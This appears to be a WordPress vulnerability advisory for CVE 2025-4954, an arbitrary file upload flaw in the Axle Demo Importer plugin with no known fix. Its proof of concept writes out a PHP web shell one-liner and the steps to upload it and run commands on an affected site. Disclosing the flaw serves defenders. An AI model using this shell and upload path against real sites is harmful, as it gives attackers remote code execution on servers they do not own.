Axle Demo Importer <= 1.0.3 – Author+ Arbitrary File Upload | CVE 2025-4954 | Plugin Vulnerabilities

Description

The plugin does not validate files to be uploaded, which could allow authenticated users (author and above) to upload arbitrary files such as PHP on the server

Proof of Concept

Create a malicious PHP file:

`<?php echo "Nxploit OK - "; system($_GET['cmd']); ?>`

Add it to a ZIP archive ( zip exploit.zip shell.php )

Log in as any WordPress user with upload_files capability (Author+)

Upload the ZIP file via
http://example.com/wp-admin/themes.php?page=axle-demo-importer

Access the web shell:
http://example.com/wp-content/uploads/axle-demo-importer-tmp/shell.php?cmd=id

Affects Plugins

axle-demo-importer

No known fix

References

CVE

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Verified

Yes

WPVDB ID

673f35ff-e1d5-4099-86e7-8b6e3e410ef8

Timeline

Publicly Published

2025-05-20 (about 7 months ago)

Added

2025-05-20 (about 7 months ago)

Last Updated

2025-05-20 (about 7 months ago)

Other

Published

Title

Published

2022-11-28

Title

SEO Plugin by Squirrly SEO < 12.1.11 - Contributor+ Arbitrary File Upload

Published

2014-08-01

Title

Resume Submissions Job Posting <= 2.5.1 - Unrestricted File Upload

Published

2025-06-24

Title

Drop Uploader for CF7 - Drag&Drop File Uploader Addon <= 2.4.1 - Unauthenticated Arbitrary File Upload

Published

2016-04-23

Title

Tevolution < 2.3.0 - Unrestricted File Upload

Published

2014-08-01

Title

Deep-Blue 1.9.2 - Arbitrary File Upload